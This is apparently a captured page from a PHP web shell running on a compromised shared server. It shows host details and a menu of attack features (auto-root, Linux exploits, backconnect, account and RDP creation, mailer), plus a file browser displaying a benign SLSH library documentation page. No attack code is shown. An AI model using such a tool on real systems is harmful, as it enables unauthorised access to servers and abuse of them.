Linux iad1-shared-b7-18 6.6.49-grsec-jammy+ #10 SMP Thu Sep 12 23:23:08 UTC 2024 x86_64
Apache
: 67.205.6.31 | : 216.73.216.47
Cant Read [ /etc/named.conf ]
8.2.29
fernandoquevedo
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
usr /
share /
doc /
slsh /
html /
[ HOME SHELL ]
Name
Size
Permission
Action
slshfun-1.html
1.64
KB
-rw-r--r--
slshfun-10.html
5.17
KB
-rw-r--r--
slshfun-11.html
5.36
KB
-rw-r--r--
slshfun-12.html
3.4
KB
-rw-r--r--
slshfun-13.html
7.79
KB
-rw-r--r--
slshfun-2.html
3.84
KB
-rw-r--r--
slshfun-3.html
9.51
KB
-rw-r--r--
slshfun-4.html
6.4
KB
-rw-r--r--
slshfun-5.html
6.61
KB
-rw-r--r--
slshfun-6.html
4.13
KB
-rw-r--r--
slshfun-7.html
3.36
KB
-rw-r--r--
slshfun-8.html
7.78
KB
-rw-r--r--
slshfun-9.html
9.96
KB
-rw-r--r--
slshfun.html
5.16
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : slshfun-1.html
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN"> <HTML> <HEAD> <META NAME="GENERATOR" CONTENT="LinuxDoc-Tools 0.9.69"> <TITLE> SLSH Library Reference (version 2.3.0): Introduction</TITLE> <LINK HREF="slshfun-2.html" REL=next> <LINK HREF="slshfun.html#toc1" REL=contents> </HEAD> <BODY> <A HREF="slshfun-2.html">Next</A> Previous <A HREF="slshfun.html#toc1">Contents</A> <HR> <H2><A NAME="s1">1.</A> <A HREF="slshfun.html#toc1">Introduction</A></H2> <P>This document describes both the <B>slsh</B> intrinsic functions and the <B>slsh</B> library functions. The latter functions are written in <B>S-Lang</B> and make use of lower-level intrinsic functions that are described in the <A HREF="http://www.jedsoft.org/slang/doc/html/slangfun.html">Intrinsic Function Reference Manual</A>. As the <B>slsh</B> library functions make no use of <B>slsh</B> intrinsics, they may be used by any conforming <B>S-Lang</B> application. The <B>slsh</B> intrinsic functions are specific to <B>slsh</B>.</P> <P>Before a particular <B>slsh</B> library function may be used, the file that defines the function must first be loaded. The recommended mechanism for loading a file is through the use of the <CODE>require</CODE> function, e.g., <BLOCKQUOTE><CODE> <PRE> require ("structfuns"); </PRE> </CODE></BLOCKQUOTE> will make the functions defined in the file <CODE>structfuns.sl</CODE> available to the interpreter. The <CODE>require</CODE> function itself is defined in the file <CODE>require.sl</CODE>, which a conforming application will automatically load.</P> <HR> <A HREF="slshfun-2.html">Next</A> Previous <A HREF="slshfun.html#toc1">Contents</A> </BODY> </HTML>
Close